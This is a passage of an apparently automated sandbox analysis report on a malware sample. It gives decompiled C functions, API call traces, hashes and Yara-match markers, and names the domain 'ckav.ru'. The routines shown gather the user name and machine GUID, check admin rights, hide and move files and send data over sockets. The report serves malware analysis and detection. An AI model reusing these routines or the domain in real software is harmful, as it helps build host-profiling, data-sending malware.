                                              • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$CreateFreeProcessThread_wmemset
                                            • String ID: ckav.ru
                                            • API String ID: 2915393847-2696028687
                                            • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                            • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                            • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                            • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                                            0x00406340
                                            0x00406345
                                            0x00406373
                                            0x00406373
                                            0x00406347
                                            0x0040634f
                                            0x00406354
                                            0x00406357
                                            0x0040635c
                                            0x00406366
                                            0x0040636d
                                            0x00000000
                                            0x00406368
                                            0x00406368
                                            0x00406368
                                            0x00406366
                                            0x0040637a

                                            APIs
                                              • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                            • _wmemset.LIBCMT ref: 0040634F
                                              • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateNameProcessUser_wmemset
                                            • String ID: CA
                                            • API String ID: 2078537776-1052703068
                                            • Opcode ID: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                                            • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                            • Opcode Fuzzy Hash: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                                            • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                                            0x00406094
                                            0x004060a8
                                            0x004060ab

                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID: IDA
                                            • API String ID: 4114910276-365204570
                                            • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                            • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                            • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                            • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                                            0x00402c10
                                            0x00402c15
                                            0x00402c1b
                                            0x00402c1e

                                            APIs
                                            • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc
                                            • String ID: s1@
                                            • API String ID: 190572456-427247929
                                            • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                            • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                            • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                            • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 92%
                                            			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                                            0x00404a56
                                            0x00404a65
                                            0x00404a6a
                                            0x00404ad1
                                            0x00404ad1
                                            0x00404a6c
                                            0x00404a71
                                            0x00404a79
                                            0x00404a85
                                            0x00404a9a
                                            0x00404a9e
                                            0x00404acb
                                            0x00000000
                                            0x00404aa0
                                            0x00404aac
                                            0x00404abc
                                            0x00404ac1
                                            0x00404ac6
                                            0x00404ac6
                                            0x00404a9e
                                            0x00404ad9

                                            APIs
                                              • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                            • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                            • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 1425999871-0
                                            • Opcode ID: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                                            • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                            • Opcode Fuzzy Hash: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                                            • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402BAB, Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}





                                            0x00402bb2
                                            0x00402bc0
                                            0x00000000
                                            0x00402bc0
                                            0x00402bc7

                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                            • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                            • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                                            • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                            • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 40%
                                            			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                                            0x004060c6
                                            0x004060d5
                                            0x004060d8
                                            0x004060f4
                                            0x004060f6
                                            0x004060fb
                                            0x0040610a
                                            0x00406115
                                            0x0040611c
                                            0x0040611e
                                            0x00406121
                                            0x00000000
                                            0x0040612a
                                            0x0040612f

                                            APIs
                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CheckMembershipToken
                                            • String ID:
                                            • API String ID: 1351025785-0
                                            • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                            • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                            • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                            • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                                            0x00403c68
                                            0x00403c70
                                            0x00403c78
                                            0x00403c82
                                            0x00403c8b
                                            0x00403c8f
                                            0x00403c72
                                            0x00403c76
                                            0x00403c76

                                            APIs
                                            • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateDirectory
                                            • String ID:
                                            • API String ID: 4241100979-0
                                            • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                            • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                            • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                            • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                                            0x0040643c
                                            0x00406445
                                            0x00406454

                                            APIs
                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: InfoNativeSystem
                                            • String ID:
                                            • API String ID: 1721193555-0
                                            • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                            • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                            • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                            • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                                            0x00404eed
                                            0x00404ef2
                                            0x00404efd
                                            0x00404efd
                                            0x00404f07
                                            0x00404f0e

                                            APIs
                                            • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                            • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                            • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                            • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                                            0x00403bdd
                                            0x00403beb
                                            0x00403bee

                                            APIs
                                            • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileMove
                                            • String ID:
                                            • API String ID: 3562171763-0
                                            • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                            • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                            • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                            • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Startup
                                            • String ID:
                                            • API String ID: 724789610-0
                                            • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                            • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                            • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                            • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                                            0x0040428a
                                            0x00404297
                                            0x0040429a

                                            APIs
                                            • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                            • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                            • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                            • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                                            0x00404a27
                                            0x00404a35
                                            0x00404a38

                                            APIs
                                            • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                            • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                            • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                            • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                                            0x00403c4d
                                            0x00403c55
                                            0x00403c58

                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                            • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                            • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                            • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                                            0x00403c15
                                            0x00403c1d
                                            0x00403c20

                                            APIs
                                            • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                            • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                            • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                            • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                                            0x00402c2c
                                            0x00402c34
                                            0x00402c37

                                            APIs
                                            • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                            • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                            • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                            • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                                            0x00403bfc
                                            0x00403c04
                                            0x00403c07

                                            APIs
                                            • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CloseFind
                                            • String ID:
                                            • API String ID: 1863332320-0
                                            • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                            • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                            • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                            • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                                            0x00403bc4
                                            0x00403bcc
                                            0x00403bcf

                                            APIs
                                            • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                            • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                            • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                            • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                                            0x00404a0d
                                            0x00404a15
                                            0x00404a18

                                            APIs
                                            • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
